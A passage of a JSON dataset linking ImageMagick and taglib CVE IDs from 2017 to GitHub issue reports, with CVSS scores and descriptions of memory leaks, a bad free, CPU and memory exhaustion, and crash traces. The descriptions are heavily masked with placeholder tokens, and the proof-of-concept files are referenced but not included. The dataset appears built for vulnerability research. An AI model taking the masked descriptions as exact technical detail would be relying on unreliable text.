  7796. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7797. "severity": "HIGH",
  7798. "baseScore": 8.8,
  7799. "impactScore": 5.9,
  7800. "exploitabilityScore": 2.8
  7801. },
  7802. {
  7803. "CVE_ID": "CVE-2017-12668",
  7804. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/575",
  7805. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/575",
  7806. "Repo_new": "imagemagick/imagemagick",
  7807. "Issue_Created_At": "2017-07-17T01:29:33Z",
  7808. "description": "memory leak in APITAG . Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
  7809. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7810. "severity": "HIGH",
  7811. "baseScore": 8.8,
  7812. "impactScore": 5.9,
  7813. "exploitabilityScore": 2.8
  7814. },
  7815. {
  7816. "CVE_ID": "CVE-2017-12669",
  7817. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/571",
  7818. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/571",
  7819. "Repo_new": "imagemagick/imagemagick",
  7820. "Issue_Created_At": "2017-07-17T00:25:46Z",
  7821. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
  7822. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7823. "severity": "HIGH",
  7824. "baseScore": 8.8,
  7825. "impactScore": 5.9,
  7826. "exploitabilityScore": 2.8
  7827. },
  7828. {
  7829. "CVE_ID": "CVE-2017-12670",
  7830. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/610",
  7831. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/610",
  7832. "Repo_new": "imagemagick/imagemagick",
  7833. "Issue_Created_At": "2017-07-24T12:28:48Z",
  7834. "description": "assertion failed in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in image.c. APITAG testcase \uff1a URLTAG Credit \uff1a APITAG of Venustech",
  7835. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7836. "severity": "MEDIUM",
  7837. "baseScore": 6.5,
  7838. "impactScore": 3.6,
  7839. "exploitabilityScore": 2.8
  7840. },
  7841. {
  7842. "CVE_ID": "CVE-2017-12671",
  7843. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/621",
  7844. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/621",
  7845. "Repo_new": "imagemagick/imagemagick",
  7846. "Issue_Created_At": "2017-07-25T11:36:32Z",
  7847. "description": "bad free in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A bad free vulnerability was found in function APITAG ,which allow attackers to cause a denial of service (bad free) via a crafted file. ERRORTAG testcase: URLTAG APITAG of Venustech",
  7848. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7849. "severity": "MEDIUM",
  7850. "baseScore": 6.5,
  7851. "impactScore": 3.6,
  7852. "exploitabilityScore": 2.8
  7853. },
  7854. {
  7855. "CVE_ID": "CVE-2017-12672",
  7856. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/617",
  7857. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/617",
  7858. "Repo_new": "imagemagick/imagemagick",
  7859. "Issue_Created_At": "2017-07-25T11:05:14Z",
  7860. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG ,which allow attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
  7861. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7862. "severity": "MEDIUM",
  7863. "baseScore": 6.5,
  7864. "impactScore": 3.6,
  7865. "exploitabilityScore": 2.8
  7866. },
  7867. {
  7868. "CVE_ID": "CVE-2017-12673",
  7869. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/619",
  7870. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/619",
  7871. "Repo_new": "imagemagick/imagemagick",
  7872. "Issue_Created_At": "2017-07-25T11:12:37Z",
  7873. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG ,which allow attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
  7874. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7875. "severity": "MEDIUM",
  7876. "baseScore": 6.5,
  7877. "impactScore": 3.6,
  7878. "exploitabilityScore": 2.8
  7879. },
  7880. {
  7881. "CVE_ID": "CVE-2017-12674",
  7882. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/604",
  7883. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/604",
  7884. "Repo_new": "imagemagick/imagemagick",
  7885. "Issue_Created_At": "2017-07-23T15:22:16Z",
  7886. "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When convert PDB file , imagemagick will read data from input file and deal with it, here is the critical code: pdb.c , in function APITAG CODETAG A crafted file will cause this while loop endless. testcase: FILETAG Credit : APITAG of Venustech",
  7887. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7888. "severity": "MEDIUM",
  7889. "baseScore": 6.5,
  7890. "impactScore": 3.6,
  7891. "exploitabilityScore": 2.8
  7892. },
  7893. {
  7894. "CVE_ID": "CVE-2017-12675",
  7895. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/616",
  7896. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/616",
  7897. "Repo_new": "imagemagick/imagemagick",
  7898. "Issue_Created_At": "2017-07-25T11:03:39Z",
  7899. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG ,which allow attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
  7900. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7901. "severity": "MEDIUM",
  7902. "baseScore": 6.5,
  7903. "impactScore": 3.6,
  7904. "exploitabilityScore": 2.8
  7905. },
  7906. {
  7907. "CVE_ID": "CVE-2017-12676",
  7908. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/618",
  7909. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/618",
  7910. "Repo_new": "imagemagick/imagemagick",
  7911. "Issue_Created_At": "2017-07-25T11:06:12Z",
  7912. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG ,which allow attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
  7913. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7914. "severity": "MEDIUM",
  7915. "baseScore": 6.5,
  7916. "impactScore": 3.6,
  7917. "exploitabilityScore": 2.8
  7918. },
  7919. {
  7920. "CVE_ID": "CVE-2017-12678",
  7921. "Issue_Url_old": "https://github.com/taglib/taglib/issues/829",
  7922. "Issue_Url_new": "https://github.com/taglib/taglib/issues/829",
  7923. "Repo_new": "taglib/taglib",
  7924. "Issue_Created_At": "2017-07-18T02:28:33Z",
  7925. "description": "A pointer to cast vulnerbility is discovered in the project. Overview\uff1a I discovered a vulnerability of pointer cast in APITAG vulnerability exist in the code of reading the tag of a mp3 video of ID NUMBERTAG APITAG casting a pointer of a List in a tag to APITAG ,the address of the APITAG in the tag becomes an invalid value. Report and POC\uff1a The detail analysis report and APITAG files can be found in the attachment. In order to avoid disclosing it before release of patch, I have encrypted the zip file. Developers can communicate with me to get the password. FILETAG Author name: APITAG @ VARAS of IIE APITAG Liu @ VARAS of IIE email: EMAILTAG org: IIE ( FILETAG Note I have also reported this to APITAG Security Team.",
  7926. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7927. "severity": "HIGH",
  7928. "baseScore": 8.8,
  7929. "impactScore": 5.9,
  7930. "exploitabilityScore": 2.8
  7931. },
  7932. {
  7933. "CVE_ID": "CVE-2017-12691",
  7934. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/656",
  7935. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/656",
  7936. "Repo_new": "imagemagick/imagemagick",
  7937. "Issue_Created_At": "2017-08-07T01:40:35Z",
  7938. "description": "memory exhaustion in APITAG PATHTAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): jng jpeg png xml zlib PATHTAG magick convert oom APITAG /dev/null NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG c NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG ffff NUMBERTAG heap NUMBERTAG ffff NUMBERTAG b1a NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG a0df NUMBERTAG a0df NUMBERTAG a0df NUMBERTAG a0df NUMBERTAG a NUMBERTAG f NUMBERTAG a NUMBERTAG c NUMBERTAG a NUMBERTAG d NUMBERTAG a NUMBERTAG d NUMBERTAG a1f7d NUMBERTAG a NUMBERTAG a NUMBERTAG a NUMBERTAG c NUMBERTAG a NUMBERTAG d NUMBERTAG a NUMBERTAG d NUMBERTAG a2d NUMBERTAG stack NUMBERTAG b2f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b3a NUMBERTAG b3b NUMBERTAG b3c NUMBERTAG b3d NUMBERTAG b3e NUMBERTAG b3f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5ad NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c6e NUMBERTAG b5c6e NUMBERTAG b5c6f NUMBERTAG PATHTAG NUMBERTAG b5c6f NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e4b NUMBERTAG PATHTAG NUMBERTAG b6e4b NUMBERTAG b6e4c NUMBERTAG PATHTAG NUMBERTAG b6e4c NUMBERTAG b6e4d NUMBERTAG PATHTAG NUMBERTAG b6e4d NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ffc NUMBERTAG b6ffc NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG aa NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG aa NUMBERTAG b NUMBERTAG ab NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG ab NUMBERTAG b NUMBERTAG ac NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG ac NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG dso NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG da NUMBERTAG PATHTAG NUMBERTAG bf NUMBERTAG bf NUMBERTAG stack] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG fa4c1 ( PATHTAG NUMBERTAG b NUMBERTAG fe6a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG be NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG bf5e9 ( PATHTAG NUMBERTAG b NUMBERTAG f4d NUMBERTAG in __interceptor_posix_memalign ( PATHTAG NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG fa NUMBERTAG in APITAG APITAG NUMBERTAG bc in APITAG APITAG NUMBERTAG d in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG f0 in APITAG APITAG NUMBERTAG f0 in APITAG APITAG NUMBERTAG c8 in APITAG APITAG NUMBERTAG bb NUMBERTAG in APITAG APITAG NUMBERTAG ea0ba0 in APITAG APITAG NUMBERTAG fa NUMBERTAG d1 in APITAG APITAG NUMBERTAG e7a in APITAG APITAG NUMBERTAG a in main APITAG NUMBERTAG b6e NUMBERTAG a NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG ba ( PATHTAG ) POC URLTAG",
  7939. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7940. "severity": "MEDIUM",
  7941. "baseScore": 6.5,
  7942. "impactScore": 3.6,
  7943. "exploitabilityScore": 2.8
  7944. },
  7945. {
  7946. "CVE_ID": "CVE-2017-12692",
  7947. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/653",
  7948. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/653",
  7949. "Repo_new": "imagemagick/imagemagick",
  7950. "Issue_Created_At": "2017-08-06T06:10:56Z",
  7951. "description": "memory exhaustion in APITAG PATHTAG magick convert oom APITAG /dev/null NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG ffff NUMBERTAG b2d NUMBERTAG b2e NUMBERTAG b2f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b3a NUMBERTAG b3b NUMBERTAG b3c NUMBERTAG b3d NUMBERTAG b3e NUMBERTAG b3f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5ac NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG PATHTAG NUMBERTAG b5c NUMBERTAG b6dfa NUMBERTAG b6dfa NUMBERTAG b6e1e NUMBERTAG PATHTAG NUMBERTAG b6e1e NUMBERTAG b6e1f NUMBERTAG PATHTAG NUMBERTAG b6e1f NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6fce NUMBERTAG PATHTAG NUMBERTAG b6fce NUMBERTAG b6fd NUMBERTAG PATHTAG NUMBERTAG b6fd NUMBERTAG b6fd NUMBERTAG PATHTAG NUMBERTAG b6fd NUMBERTAG b6fd NUMBERTAG b6fd NUMBERTAG b6fec NUMBERTAG PATHTAG NUMBERTAG b6fec NUMBERTAG b6fed NUMBERTAG PATHTAG NUMBERTAG b6fed NUMBERTAG b6fee NUMBERTAG PATHTAG NUMBERTAG b6fee NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG fa NUMBERTAG b NUMBERTAG fa NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG dso NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG bf NUMBERTAG bf NUMBERTAG stack] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG d NUMBERTAG c1 ( PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG dbe NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG cc NUMBERTAG a in __interceptor_malloc ( PATHTAG NUMBERTAG b4eb in APITAG APITAG NUMBERTAG c8 in APITAG APITAG NUMBERTAG bb NUMBERTAG in APITAG APITAG NUMBERTAG ea0ba0 in APITAG APITAG NUMBERTAG fa NUMBERTAG d1 in APITAG APITAG NUMBERTAG e7a in APITAG APITAG NUMBERTAG a in main APITAG NUMBERTAG b6e3ea NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG ba ( PATHTAG ) POC URLTAG",
  7952. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7953. "severity": "MEDIUM",
  7954. "baseScore": 6.5,
  7955. "impactScore": 3.6,
  7956. "exploitabilityScore": 2.8
  7957. },
  7958. {
  7959. "CVE_ID": "CVE-2017-12693",
  7960. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/652",
  7961. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/652",
  7962. "Repo_new": "imagemagick/imagemagick",
  7963. "Issue_Created_At": "2017-08-06T05:40:03Z",
  7964. "description": "memory exhaustion in APITAG in APITAG PATHTAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG PATHTAG magick convert oom APITAG FILETAG NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG a NUMBERTAG a NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG ffff NUMBERTAG b2d NUMBERTAG b2e NUMBERTAG b2f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b3a NUMBERTAG b3b NUMBERTAG b3c NUMBERTAG b3d NUMBERTAG b3e NUMBERTAG b3f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5ae NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c6c NUMBERTAG b5c6c NUMBERTAG b5c6d NUMBERTAG PATHTAG NUMBERTAG b5c6d NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e4a NUMBERTAG PATHTAG NUMBERTAG b6e4a NUMBERTAG b6e4b NUMBERTAG PATHTAG NUMBERTAG b6e4b NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ffa NUMBERTAG b6ffa NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG aa NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG aa NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG dso NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG bfc NUMBERTAG bfc6a NUMBERTAG stack] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG f NUMBERTAG c1 ( PATHTAG NUMBERTAG b NUMBERTAG fc6a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG bc NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG bd5e9 ( PATHTAG NUMBERTAG b NUMBERTAG f2d NUMBERTAG in __interceptor_posix_memalign ( PATHTAG NUMBERTAG e NUMBERTAG b in APITAG APITAG NUMBERTAG e 